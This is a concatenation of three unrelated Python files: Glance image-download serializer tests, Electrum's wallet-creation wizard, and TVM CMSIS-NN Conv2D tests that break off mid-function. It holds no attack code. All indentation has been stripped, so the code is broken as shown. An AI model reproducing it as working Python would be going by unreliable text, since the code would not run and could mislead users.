self.assertEqual('3', response.headers['Content-Length'])
self.assertNotIn('Content-MD5', response.headers)
self.assertEqual('application/octet-stream',
response.headers['Content-Type'])
def test_download_with_checksum(self):
request = wsgi.Request.blank('/')
request.environ = {}
response = webob.Response()
response.request = request
checksum = '0745064918b49693cca64d6b6a13d28a'
image = FakeImage(size=3, checksum=checksum, data=[b'Z', b'Z', b'Z'])
self.serializer.download(response, image)
self.assertEqual(b'ZZZ', response.body)
self.assertEqual('3', response.headers['Content-Length'])
self.assertEqual(checksum, response.headers['Content-MD5'])
self.assertEqual('application/octet-stream',
response.headers['Content-Type'])
def test_download_forbidden(self):
"""Make sure the serializer can return 403 forbidden error instead of
500 internal server error.
"""
def get_data(*args, **kwargs):
raise exception.Forbidden()
self.stubs.Set(glance.api.policy.ImageProxy,
'get_data',
get_data)
request = wsgi.Request.blank('/')
request.environ = {}
response = webob.Response()
response.request = request
image = FakeImage(size=3, data=iter('ZZZ'))
image.get_data = get_data
self.assertRaises(webob.exc.HTTPForbidden,
self.serializer.download,
response, image)
def test_download_no_content(self):
"""Test image download returns HTTPNoContent
Make sure that serializer returns 204 no content error in case of
image data is not available at specified location.
"""
with mock.patch.object(glance.api.policy.ImageProxy,
'get_data') as mock_get_data:
mock_get_data.side_effect = glance_store.NotFound(image="image")
request = wsgi.Request.blank('/')
response = webob.Response()
response.request = request
image = FakeImage(size=3, data=iter('ZZZ'))
image.get_data = mock_get_data
self.assertRaises(webob.exc.HTTPNoContent,
self.serializer.download,
response, image)
def test_download_service_unavailable(self):
"""Test image download returns HTTPServiceUnavailable."""
with mock.patch.object(glance.api.policy.ImageProxy,
'get_data') as mock_get_data:
mock_get_data.side_effect = glance_store.RemoteServiceUnavailable()
request = wsgi.Request.blank('/')
response = webob.Response()
response.request = request
image = FakeImage(size=3, data=iter('ZZZ'))
image.get_data = mock_get_data
self.assertRaises(webob.exc.HTTPServiceUnavailable,
self.serializer.download,
response, image)
def test_download_store_get_not_support(self):
"""Test image download returns HTTPBadRequest.
Make sure that serializer returns 400 bad request error in case of
getting images from this store is not supported at specified location.
"""
with mock.patch.object(glance.api.policy.ImageProxy,
'get_data') as mock_get_data:
mock_get_data.side_effect = glance_store.StoreGetNotSupported()
request = wsgi.Request.blank('/')
response = webob.Response()
response.request = request
image = FakeImage(size=3, data=iter('ZZZ'))
image.get_data = mock_get_data
self.assertRaises(webob.exc.HTTPBadRequest,
self.serializer.download,
response, image)
def test_download_store_random_get_not_support(self):
"""Test image download returns HTTPBadRequest.
Make sure that serializer returns 400 bad request error in case of
getting randomly images from this store is not supported at
specified location.
"""
with mock.patch.object(glance.api.policy.ImageProxy,
'get_data') as m_get_data:
err = glance_store.StoreRandomGetNotSupported(offset=0,
chunk_size=0)
m_get_data.side_effect = err
request = wsgi.Request.blank('/')
response = webob.Response()
response.request = request
image = FakeImage(size=3, data=iter('ZZZ'))
image.get_data = m_get_data
self.assertRaises(webob.exc.HTTPBadRequest,
self.serializer.download,
response, image)
def test_upload(self):
request = webob.Request.blank('/')
request.environ = {}
response = webob.Response()
response.request = request
self.serializer.upload(response, {})
self.assertEqual(204, response.status_int)
self.assertEqual('0', response.headers['Content-Length'])
|
|
# -*- coding: utf-8 -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import traceback
from functools import partial
from . import bitcoin
from . import keystore
from .keystore import bip44_derivation, purpose48_derivation
from .wallet import (Imported_Wallet, Standard_Wallet, Multisig_Wallet,
wallet_types, Wallet, Abstract_Wallet)
from .storage import (WalletStorage, STO_EV_USER_PW, STO_EV_XPUB_PW,
get_derivation_used_for_hw_device_encryption)
from .i18n import _
from .util import UserCancelled, InvalidPassword, WalletFileException
from .simple_config import SimpleConfig
from .plugin import Plugins
# hardware device setup purpose
HWD_SETUP_NEW_WALLET, HWD_SETUP_DECRYPT_WALLET = range(0, 2)
class ScriptTypeNotSupported(Exception): pass
class GoBack(Exception): pass
class BaseWizard(object):
def __init__(self, config: SimpleConfig, plugins: Plugins, storage: WalletStorage):
super(BaseWizard, self).__init__()
self.config = config
self.plugins = plugins
self.storage = storage
self.wallet = None # type: Abstract_Wallet
self.stack = []
self.plugin = None
self.keystores = []
self.is_kivy = config.get('gui') == 'kivy'
self.seed_type = None
def set_icon(self, icon):
pass
def run(self, *args):
action = args[0]
args = args[1:]
self.stack.append((action, args))
if not action:
return
if type(action) is tuple:
self.plugin, action = action
if self.plugin and hasattr(self.plugin, action):
f = getattr(self.plugin, action)
f(self, *args)
elif hasattr(self, action):
f = getattr(self, action)
f(*args)
else:
raise Exception("unknown action", action)
def can_go_back(self):
return len(self.stack)>1
def go_back(self):
if not self.can_go_back():
return
self.stack.pop()
action, args = self.stack.pop()
self.run(action, *args)
def new(self):
name = os.path.basename(self.storage.path)
title = _("Create") + ' ' + name
message = '\n'.join([
_("What kind of wallet do you want to create?")
])
wallet_kinds = [
('standard', _("Standard wallet")),
('2fa', _("Wallet with two-factor authentication")),
('multisig', _("Multi-signature wallet")),
('imported', _("Import Bitcoin addresses or private keys")),
]
choices = [pair for pair in wallet_kinds if pair[0] in wallet_types]
self.choice_dialog(title=title, message=message, choices=choices, run_next=self.on_wallet_type)
def upgrade_storage(self):
exc = None
def on_finished():
if exc is None:
self.wallet = Wallet(self.storage)
self.terminate()
else:
raise exc
def do_upgrade():
nonlocal exc
try:
self.storage.upgrade()
except Exception as e:
exc = e
self.waiting_dialog(do_upgrade, _('Upgrading wallet format...'), on_finished=on_finished)
def load_2fa(self):
self.storage.put('wallet_type', '2fa')
self.storage.put('use_trustedcoin', True)
self.plugin = self.plugins.load_plugin('trustedcoin')
def on_wallet_type(self, choice):
self.wallet_type = choice
if choice == 'standard':
action = 'choose_keystore'
elif choice == 'multisig':
action = 'choose_multisig'
elif choice == '2fa':
self.load_2fa()
action = self.storage.get_action()
elif choice == 'imported':
action = 'import_addresses_or_keys'
self.run(action)
def choose_multisig(self):
def on_multisig(m, n):
self.multisig_type = "%dof%d"%(m, n)
self.storage.put('wallet_type', self.multisig_type)
self.n = n
self.run('choose_keystore')
self.multisig_dialog(run_next=on_multisig)
def choose_keystore(self):
assert self.wallet_type in ['standard', 'multisig']
i = len(self.keystores)
title = _('Add cosigner') + ' (%d of %d)'%(i+1, self.n) if self.wallet_type=='multisig' else _('Keystore')
if self.wallet_type =='standard' or i==0:
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_from_seed', _('I already have a seed')),
('restore_from_key', _('Use a master key')),
]
if not self.is_kivy:
choices.append(('choose_hw_device', _('Use a hardware device')))
else:
message = _('Add a cosigner to your multi-sig wallet')
choices = [
('restore_from_key', _('Enter cosigner key')),
('restore_from_seed', _('Enter cosigner seed')),
]
if not self.is_kivy:
choices.append(('choose_hw_device', _('Cosign with hardware device')))
self.choice_dialog(title=title, message=message, choices=choices, run_next=self.run)
def import_addresses_or_keys(self):
v = lambda x: keystore.is_address_list(x) or keystore.is_private_key_list(x)
title = _("Import Bitcoin Addresses")
message = _("Enter a list of Bitcoin addresses (this will create a watching-only wallet), or a list of private keys.")
self.add_xpub_dialog(title=title, message=message, run_next=self.on_import,
is_valid=v, allow_multi=True, show_wif_help=True)
def on_import(self, text):
# create a temporary wallet and exploit that modifications
# will be reflected on self.storage
if keystore.is_address_list(text):
w = Imported_Wallet(self.storage)
for x in text.split():
w.import_address(x)
elif keystore.is_private_key_list(text):
k = keystore.Imported_KeyStore({})
self.storage.put('keystore', k.dump())
w = Imported_Wallet(self.storage)
for x in keystore.get_private_keys(text):
w.import_private_key(x, None)
self.keystores.append(w.keystore)
else:
return self.terminate()
return self.run('create_wallet')
def restore_from_key(self):
if self.wallet_type == 'standard':
v = keystore.is_master_key
title = _("Create keystore from a master key")
message = ' '.join([
_("To create a watching-only wallet, please enter your master public key (xpub/ypub/zpub)."),
_("To create a spending wallet, please enter a master private key (xprv/yprv/zprv).")
])
self.add_xpub_dialog(title=title, message=message, run_next=self.on_restore_from_key, is_valid=v)
else:
i = len(self.keystores) + 1
self.add_cosigner_dialog(index=i, run_next=self.on_restore_from_key, is_valid=keystore.is_bip32_key)
def on_restore_from_key(self, text):
k = keystore.from_master_key(text)
self.on_keystore(k)
def choose_hw_device(self, purpose=HWD_SETUP_NEW_WALLET):
title = _('Hardware Keystore')
# check available plugins
support = self.plugins.get_hardware_support()
if not support:
msg = '\n'.join([
_('No hardware wallet support found on your system.'),
_('Please install the relevant libraries (eg python-trezor for Trezor).'),
])
self.confirm_dialog(title=title, message=msg, run_next= lambda x: self.choose_hw_device(purpose))
return
# scan devices
devices = []
devmgr = self.plugins.device_manager
try:
scanned_devices = devmgr.scan_devices()
except BaseException as e:
devmgr.print_error('error scanning devices: {}'.format(e))
debug_msg = ' {}:\n {}'.format(_('Error scanning devices'), e)
else:
debug_msg = ''
for name, description, plugin in support:
try:
# FIXME: side-effect: unpaired_device_info sets client.handler
u = devmgr.unpaired_device_infos(None, plugin, devices=scanned_devices)
except BaseException as e:
devmgr.print_error('error getting device infos for {}: {}'.format(name, e))
indented_error_msg = ' '.join([''] + str(e).splitlines(keepends=True))
debug_msg += ' {}:\n{}\n'.format(plugin.name, indented_error_msg)
continue
devices += list(map(lambda x: (name, x), u))
if not debug_msg:
debug_msg = ' {}'.format(_('No exceptions encountered.'))
if not devices:
msg = ''.join([
_('No hardware device detected.') + '\n',
_('To trigger a rescan, press \'Next\'.') + '\n\n',
_('If your device is not detected on Windows, go to "Settings", "Devices", "Connected devices", and do "Remove device". Then, plug your device again.') + ' ',
_('On Linux, you might have to add a new permission to your udev rules.') + '\n\n',
_('Debug message') + '\n',
debug_msg
])
self.confirm_dialog(title=title, message=msg, run_next= lambda x: self.choose_hw_device(purpose))
return
# select device
self.devices = devices
choices = []
for name, info in devices:
state = _("initialized") if info.initialized else _("wiped")
label = info.label or _("An unnamed {}").format(name)
descr = "%s [%s, %s]" % (label, name, state)
choices.append(((name, info), descr))
msg = _('Select a device') + ':'
self.choice_dialog(title=title, message=msg, choices=choices, run_next= lambda *args: self.on_device(*args, purpose=purpose))
def on_device(self, name, device_info, *, purpose):
self.plugin = self.plugins.get_plugin(name)
try:
self.plugin.setup_device(device_info, self, purpose)
except OSError as e:
self.show_error(_('We encountered an error while connecting to your device:')
+ '\n' + str(e) + '\n'
+ _('To try to fix this, we will now re-pair with your device.') + '\n'
+ _('Please try again.'))
devmgr = self.plugins.device_manager
devmgr.unpair_id(device_info.device.id_)
self.choose_hw_device(purpose)
return
except (UserCancelled, GoBack):
self.choose_hw_device(purpose)
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
self.choose_hw_device(purpose)
return
if purpose == HWD_SETUP_NEW_WALLET:
def f(derivation, script_type):
self.run('on_hw_derivation', name, device_info, derivation, script_type)
self.derivation_and_script_type_dialog(f)
elif purpose == HWD_SETUP_DECRYPT_WALLET:
derivation = get_derivation_used_for_hw_device_encryption()
xpub = self.plugin.get_xpub(device_info.device.id_, derivation, 'standard', self)
password = keystore.Xpub.get_pubkey_from_xpub(xpub, ())
try:
self.storage.decrypt(password)
except InvalidPassword:
# try to clear session so that user can type another passphrase
devmgr = self.plugins.device_manager
client = devmgr.client_by_id(device_info.device.id_)
if hasattr(client, 'clear_session'): # FIXME not all hw wallet plugins have this
client.clear_session()
raise
else:
raise Exception('unknown purpose: %s' % purpose)
def derivation_and_script_type_dialog(self, f):
message1 = _('Choose the type of addresses in your wallet.')
message2 = '\n'.join([
_('You can override the suggested derivation path.'),
_('If you are not sure what this is, leave this field unchanged.')
])
if self.wallet_type == 'multisig':
# There is no general standard for HD multisig.
# For legacy, this is partially compatible with BIP45; assumes index=0
# For segwit, a custom path is used, as there is no standard at all.
choices = [
('standard', 'legacy multisig (p2sh)', "m/45'/0"),
('p2wsh-p2sh', 'p2sh-segwit multisig (p2wsh-p2sh)', purpose48_derivation(0, xtype='p2wsh-p2sh')),
('p2wsh', 'native segwit multisig (p2wsh)', purpose48_derivation(0, xtype='p2wsh')),
]
else:
choices = [
('standard', 'legacy (p2pkh)', bip44_derivation(0, bip43_purpose=44)),
('p2wpkh-p2sh', 'p2sh-segwit (p2wpkh-p2sh)', bip44_derivation(0, bip43_purpose=49)),
('p2wpkh', 'native segwit (p2wpkh)', bip44_derivation(0, bip43_purpose=84)),
]
while True:
try:
self.choice_and_line_dialog(
run_next=f, title=_('Script type and Derivation path'), message1=message1,
message2=message2, choices=choices, test_text=bitcoin.is_bip32_derivation)
return
except ScriptTypeNotSupported as e:
self.show_error(e)
# let the user choose again
def on_hw_derivation(self, name, device_info, derivation, xtype):
from .keystore import hardware_keystore
try:
xpub = self.plugin.get_xpub(device_info.device.id_, derivation, xtype, self)
except ScriptTypeNotSupported:
raise # this is handled in derivation_dialog
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(e)
return
d = {
'type': 'hardware',
'hw_type': name,
'derivation': derivation,
'xpub': xpub,
'label': device_info.label,
}
k = hardware_keystore(d)
self.on_keystore(k)
def passphrase_dialog(self, run_next, is_restoring=False):
title = _('Seed extension')
message = '\n'.join([
_('You may extend your seed with custom words.'),
_('Your seed extension must be saved together with your seed.'),
])
warning = '\n'.join([
_('Note that this is NOT your encryption password.'),
_('If you do not know what this is, leave this field empty.'),
])
warn_issue4566 = is_restoring and self.seed_type == 'bip39'
self.line_dialog(title=title, message=message, warning=warning,
default='', test=lambda x:True, run_next=run_next,
warn_issue4566=warn_issue4566)
def restore_from_seed(self):
self.opt_bip39 = True
self.opt_ext = True
is_cosigning_seed = lambda x: bitcoin.seed_type(x) in ['standard', 'segwit']
test = bitcoin.is_seed if self.wallet_type == 'standard' else is_cosigning_seed
self.restore_seed_dialog(run_next=self.on_restore_seed, test=test)
def on_restore_seed(self, seed, is_bip39, is_ext):
self.seed_type = 'bip39' if is_bip39 else bitcoin.seed_type(seed)
if self.seed_type == 'bip39':
f = lambda passphrase: self.on_restore_bip39(seed, passphrase)
self.passphrase_dialog(run_next=f, is_restoring=True) if is_ext else f('')
elif self.seed_type in ['standard', 'segwit']:
f = lambda passphrase: self.run('create_keystore', seed, passphrase)
self.passphrase_dialog(run_next=f, is_restoring=True) if is_ext else f('')
elif self.seed_type == 'old':
self.run('create_keystore', seed, '')
elif self.seed_type == '2fa':
self.load_2fa()
self.run('on_restore_seed', seed, is_ext)
else:
raise Exception('Unknown seed type', self.seed_type)
def on_restore_bip39(self, seed, passphrase):
def f(derivation, script_type):
self.run('on_bip43', seed, passphrase, derivation, script_type)
self.derivation_and_script_type_dialog(f)
def create_keystore(self, seed, passphrase):
k = keystore.from_seed(seed, passphrase, self.wallet_type == 'multisig')
self.on_keystore(k)
def on_bip43(self, seed, passphrase, derivation, script_type):
k = keystore.from_bip39_seed(seed, passphrase, derivation, xtype=script_type)
self.on_keystore(k)
def on_keystore(self, k):
has_xpub = isinstance(k, keystore.Xpub)
if has_xpub:
from .bitcoin import xpub_type
t1 = xpub_type(k.xpub)
if self.wallet_type == 'standard':
if has_xpub and t1 not in ['standard', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_error(_('Wrong key type') + ' %s'%t1)
self.run('choose_keystore')
return
self.keystores.append(k)
self.run('create_wallet')
elif self.wallet_type == 'multisig':
assert has_xpub
if t1 not in ['standard', 'p2wsh', 'p2wsh-p2sh']:
self.show_error(_('Wrong key type') + ' %s'%t1)
self.run('choose_keystore')
return
if k.xpub in map(lambda x: x.xpub, self.keystores):
self.show_error(_('Error: duplicate master public key'))
self.run('choose_keystore')
return
if len(self.keystores)>0:
t2 = xpub_type(self.keystores[0].xpub)
if t1 != t2:
self.show_error(_('Cannot add this cosigner:') + '\n' + "Their key type is '%s', we are '%s'"%(t1, t2))
self.run('choose_keystore')
return
self.keystores.append(k)
if len(self.keystores) == 1:
xpub = k.get_master_public_key()
self.stack = []
self.run('show_xpub_and_add_cosigners', xpub)
elif len(self.keystores) < self.n:
self.run('choose_keystore')
else:
self.run('create_wallet')
def create_wallet(self):
encrypt_keystore = any(k.may_have_password() for k in self.keystores)
# note: the following condition ("if") is duplicated logic from
# wallet.get_available_storage_encryption_version()
if self.wallet_type == 'standard' and isinstance(self.keystores[0], keystore.Hardware_KeyStore):
# offer encrypting with a pw derived from the hw device
k = self.keystores[0]
try:
k.handler = self.plugin.create_handler(self)
password = k.get_password_for_storage_encryption()
except UserCancelled:
devmgr = self.plugins.device_manager
devmgr.unpair_xpub(k.xpub)
self.choose_hw_device()
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
self.request_storage_encryption(
run_next=lambda encrypt_storage: self.on_password(
password,
encrypt_storage=encrypt_storage,
storage_enc_version=STO_EV_XPUB_PW,
encrypt_keystore=False))
else:
# prompt the user to set an arbitrary password
self.request_password(
run_next=lambda password, encrypt_storage: self.on_password(
password,
encrypt_storage=encrypt_storage,
storage_enc_version=STO_EV_USER_PW,
encrypt_keystore=encrypt_keystore),
force_disable_encrypt_cb=not encrypt_keystore)
def on_password(self, password, *, encrypt_storage,
storage_enc_version=STO_EV_USER_PW, encrypt_keystore):
self.storage.set_keystore_encryption(bool(password) and encrypt_keystore)
if encrypt_storage:
self.storage.set_password(password, enc_version=storage_enc_version)
for k in self.keystores:
if k.may_have_password():
k.update_password(None, password)
if self.wallet_type == 'standard':
self.storage.put('seed_type', self.seed_type)
keys = self.keystores[0].dump()
self.storage.put('keystore', keys)
self.wallet = Standard_Wallet(self.storage)
self.run('create_addresses')
elif self.wallet_type == 'multisig':
for i, k in enumerate(self.keystores):
self.storage.put('x%d/'%(i+1), k.dump())
self.storage.write()
self.wallet = Multisig_Wallet(self.storage)
self.run('create_addresses')
elif self.wallet_type == 'imported':
if len(self.keystores) > 0:
keys = self.keystores[0].dump()
self.storage.put('keystore', keys)
self.wallet = Imported_Wallet(self.storage)
self.wallet.storage.write()
self.terminate()
def show_xpub_and_add_cosigners(self, xpub):
self.show_xpub_dialog(xpub=xpub, run_next=lambda x: self.run('choose_keystore'))
def choose_seed_type(self):
title = _('Choose Seed type')
message = ' '.join([
_("The type of addresses used by your wallet will depend on your seed."),
_("Segwit wallets use bech32 addresses, defined in BIP173."),
_("Please note that websites and other wallets may not support these addresses yet."),
_("Thus, you might want to keep using a non-segwit wallet in order to be able to receive bitcoins during the transition period.")
])
choices = [
('create_standard_seed', _('Standard')),
('create_segwit_seed', _('Segwit')),
]
self.choice_dialog(title=title, message=message, choices=choices, run_next=self.run)
def create_segwit_seed(self): self.create_seed('segwit')
def create_standard_seed(self): self.create_seed('standard')
def create_seed(self, seed_type):
from . import mnemonic
self.seed_type = seed_type
seed = mnemonic.Mnemonic('en').make_seed(self.seed_type)
self.opt_bip39 = False
f = lambda x: self.request_passphrase(seed, x)
self.show_seed_dialog(run_next=f, seed_text=seed)
def request_passphrase(self, seed, opt_passphrase):
if opt_passphrase:
f = lambda x: self.confirm_seed(seed, x)
self.passphrase_dialog(run_next=f)
else:
self.run('confirm_seed', seed, '')
def confirm_seed(self, seed, passphrase):
f = lambda x: self.confirm_passphrase(seed, passphrase)
self.confirm_seed_dialog(run_next=f, test=lambda x: x==seed)
def confirm_passphrase(self, seed, passphrase):
f = lambda x: self.run('create_keystore', seed, x)
if passphrase:
title = _('Confirm Seed Extension')
message = '\n'.join([
_('Your seed extension must be saved together with your seed.'),
_('Please type it here.'),
])
self.line_dialog(run_next=f, title=title, message=message, default='', test=lambda x: x==passphrase)
else:
f('')
def create_addresses(self):
def task():
self.wallet.synchronize()
self.wallet.storage.write()
self.terminate()
msg = _("Electrum is generating your addresses, please wait...")
self.waiting_dialog(task, msg)
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""CMSIS-NN integration tests: Conv2D"""
import itertools
import numpy as np
import pytest
import tvm
from tvm import relay
from tvm.relay.op.contrib import cmsisnn
from tests.python.relay.aot.aot_test_utils import (
AOTTestModel,
AOT_CORSTONE300_RUNNER,
AOT_DEFAULT_RUNNER,
generate_ref_data,
compile_and_run,
)
from utils import (
skip_if_no_reference_system,
make_module,
get_range_for_dtype_str,
get_same_padding,
get_conv2d_qnn_params,
make_qnn_relu,
assert_partitioned_function,
assert_no_external_function,
)
def make_model(
shape,
kernel_shape,
input_zero_point,
input_scale,
kernel_zero_point,
kernel_scale,
output_zero_point,
output_scale,
padding,
strides,
dilation,
groups,
dtype,
kernel_dtype,
out_channels,
weight_format,
enable_bias,
relu_type,
):
"""Return a model and any parameters it may have"""
h_index = weight_format.index("H")
w_index = weight_format.index("W")
kernel_h = kernel_shape[h_index]
kernel_w = kernel_shape[w_index]
invar = relay.var("input", shape=shape, dtype=dtype)
p = (0, 0, 0, 0)
if padding == "SAME":
p = get_same_padding((shape[1], shape[2]), (kernel_h, kernel_w), dilation, strides)
invar = relay.nn.pad(
invar,
pad_width=[(0, 0), (p[0], p[2]), (p[1], p[3]), (0, 0)],
pad_value=input_zero_point,
pad_mode="constant",
)
shape = (shape[0], shape[1] + p[0] + p[2], shape[2] + p[1] + p[3], shape[3])
rng = np.random.default_rng(12321)
w = tvm.nd.array(
rng.integers(
np.iinfo(kernel_dtype).min,
high=np.iinfo(kernel_dtype).max,
size=kernel_shape,
dtype=kernel_dtype,
)
)
weight_const = relay.const(w, kernel_dtype)
conv = relay.qnn.op.conv2d(
invar,
weight_const,
input_zero_point=relay.const(input_zero_point, "int32"),
kernel_zero_point=relay.const(kernel_zero_point, "int32"),
input_scale=relay.const(input_scale, "float32"),
kernel_scale=relay.const(kernel_scale, "float32"),
kernel_size=(kernel_h, kernel_w),
data_layout="NHWC",
kernel_layout=weight_format,
dilation=dilation,
strides=strides,
groups=groups,
channels=out_channels,
padding=p,
out_dtype="int32",
)
b = tvm.nd.array(rng.integers(0, high=10, size=(out_channels,), dtype="int32"))
bias_const = relay.const(b, "int32")
last_op = relay.nn.bias_add(conv, bias_const, axis=3) if enable_bias else conv
requant_input_sc = [sc * input_scale for sc in kernel_scale]
last_op = relay.qnn.op.requantize(
last_op,
relay.const(requant_input_sc, "float32"),
relay.const(0, "int32"),
relay.const(output_scale, "float32"),
relay.const(output_zero_point, "int32"),
out_dtype=dtype,
)
last_op = make_qnn_relu(last_op, relu_type, output_scale, output_zero_point, dtype)
params = {"w": w, "b": b}
return last_op, params
@tvm.testing.requires_cmsisnn
@pytest.mark.parametrize("padding", ["SAME", "VALID"])
@pytest.mark.parametrize("relu_type", ["RELU"])
@pytest.mark.parametrize("enable_bias", [True, False])
@pytest.mark.parametrize(
"input_zero_point, input_scale, kernel_scale, out_channels",
[(10, 0.0128, [0.11, 0.22], 2), (-64, 1, [1, 0.0256, 1.37], 3)],
)
def test_conv2d_symmetric_padding_int8(
padding,
enable_bias,
relu_type,
input_zero_point,
input_scale,
kernel_scale,
out_channels,
):
interface_api = "c"
use_unpacked_api = True
test_runner = AOT_CORSTONE300_RUNNER
ifm_shape = (1, 64, 100, 4)
kernel_size = (3, 3)
strides = (1, 1)
dilation = (1, 1)
dtype = "int8"
groups = 1
weight_format = "HWIO"
kernel_h = kernel_size[0]
kernel_w = kernel_size[1]
kernel_shape = (kernel_h, kernel_w, ifm_shape[3] // groups, out_channels)
kernel_zero_point = 0
in_min, in_max = get_range_for_dtype_str(dtype)
output_scale, output_zero_point = get_conv2d_qnn_params(
kernel_shape,
input_scale,
input_zero_point,
kernel_scale,
kernel_zero_point,
dtype,
dtype,
dtype,
)
model, params = make_model(
ifm_shape,
kernel_shape,
input_zero_point,
input_scale,
kernel_zero_point,
kernel_scale,
output_zero_point,
output_scale,
padding,
strides,
dilation,
groups,
dtype,
dtype,
out_channels,
weight_format,
enable_bias,
relu_type,
)
orig_mod = make_module(model)
cmsisnn_mod = cmsisnn.partition_for_cmsisnn(orig_mod, params)
# validate pattern matching
assert_partitioned_function(orig_mod, cmsisnn_mod)
# validate the output
rng = np.random.default_rng(12345)
inputs = {"input": rng.integers(in_min, high=in_max, size=ifm_shape, dtype=dtype)}
output_list = generate_ref_data(orig_mod["main"], inputs, params)
compile_and_run(
AOTTestModel(
module=cmsisnn_mod,
inputs=inputs,
outputs=output_list,
params=params,
output_tolerance=1,
),
test_runner,
interface_api,
use_unpacked_api,
)
@pytest.mark.skip(reason="See https://github.com/apache/tvm/issues/10314")
@tvm.testing.requires_cmsisnn
@pytest.mark.parametrize("padding", ["SAME", "VALID"])
@pytest.mark.parametrize("relu_type", ["RELU", "NONE"])
@pytest.mark.parametrize("enable_bias", [True, False])
@pytest.mark.parametrize(
"input_zero_point, input_scale, kernel_scale, out_channels",
[(10, 0.0128, [0.11, 0.22], 2), (-64, 1, [1, 0.0256, 1.37], 3)],
)
def test_conv2d_asymmetric_padding_int8(
padding,
enable_bias,
relu_type,
input_zero_point,
input_scale,
kernel_scale,
out_channels,
):
interface_api = "c"
use_unpacked_api = True
test_runner = AOT_CORSTONE300_RUNNER
ifm_shape = (1, 25, 25, 12)
kernel_size = (5, 5)
strides = (2, 2)
dilation = (1, 1)
dtype = "int8"
groups = 1
weight_format = "HWIO"
kernel_h = kernel_size[0]
kernel_w = kernel_size[1]
kernel_shape = (kernel_h, kernel_w, ifm_shape[3] // groups, out_channels)
kernel_zero_point = 0
in_min, in_max = get_range_for_dtype_str(dtype)
output_scale, output_zero_point = get_conv2d_qnn_params(
kernel_shape,
input_scale,
input_zero_point,
kernel_scale,
kernel_zero_point,
dtype,
dtype,
dtype,
)
model, params = make_model(
ifm_shape,
kernel_shape,
input_zero_point,
input_scale,
kernel_zero_point,
kernel_scale,
output_zero_point,
output_scale,
padding,
strides,
dilation,
groups,
dtype,
dtype,
out_channels,
weight_format,
enable_bias,
relu_type,
)
orig_mod = make_module(model)
cmsisnn_mod = cmsisnn.partition_for_cmsisnn(orig_mod, params)
# validate pattern matching
assert_partitioned_function(orig_mod, cmsisnn_mod)
# validate the output
rng = np.random.default_rng(12345)
inputs = {"input": rng.integers(in_min, high=in_max, size=ifm_shape, dtype=dtype)}
output_list = generate_ref_data(orig_mod["main"], inputs, params)
compile_and_run(
AOTTestModel(
module=cmsisnn_mod,
inputs=inputs,
outputs=output_list,
params=params,
output_tolerance=1,
),
test_runner,
interface_api,
use_unpacked_api,
)
@pytest.mark.skip(reason="See https://github.com/apache/tvm/issues/10314")
@tvm.testing.requires_cmsisnn
@pytest.mark.parametrize("ifm_shape", [(1, 28, 28, 12), (1, 64, 100, 4)])
@pytest.mark.parametrize("kernel_size", [(3, 3)])
@pytest.mark.parametrize("padding", ["SAME", "VALID"])
@pytest.mark.parametrize("strides, dilation", [((1, 1), (1, 1))])
@pytest.mark.parametrize("relu_type", ["RELU"])
@pytest.mark.parametrize(
"depth_multiplier, enable_bias",
[(1, True), (3, True)],
)
@pytest.mark.parametrize(
"input_zero_point, input_scale, kernel_scale, out_channels",
[(10, 0.0128, [0.11, 0.22], 2), (-64, 1, [1, 0.0256, 1.37], 3)],
)
def test_depthwise_int8(
ifm_shape,
kernel_size,
padding,
strides,
dilation,
enable_bias,
relu_type,
input_zero_point,
input_scale,
kernel_scale,
out_channels,
depth_multiplier,
):
interface_api = "c"
use_unpacked_api = True
test_runner = AOT_CORSTONE300_RUNNER
dtype = "int8"
groups = 1
weight_format = "HWIO"
kernel_h = kernel_size[0]
kernel_w = kernel_size[1]
kernel_shape = (kernel_h, kernel_w, ifm_shape[3] // groups, out_channels)
kernel_zero_point = 0
in_min, in_max = get_range_for_dtype_str(dtype)
groups = ifm_shape[3]
weight_format = "HWOI"
kernel_shape = (kernel_h, kernel_w, ifm_shape[3], depth_multiplier)
out_channels = ifm_shape[3] * depth_multiplier
ks_len = len(kernel_scale)
kernel_scale = [kernel_scale[i % ks_len] for i in range(out_channels)]
output_scale, output_zero_point = get_conv2d_qnn_params(
kernel_shape,
input_scale,
input_zero_point,
kernel_scale,
kernel_zero_point,
dtype,
dtype,
dtype,
True,
)
model, params = make_model(
ifm_shape,
kernel_shape,
input_zero_point,
input_scale,
kernel_zero_point,
kernel_scale,
output_zero_point,
output_scale,
padding,
strides,
dilation,
groups,
dtype,
dtype,
out_channels,
weight_format,
enable_bias,
relu_type,
)
orig_mod = make_module(model)
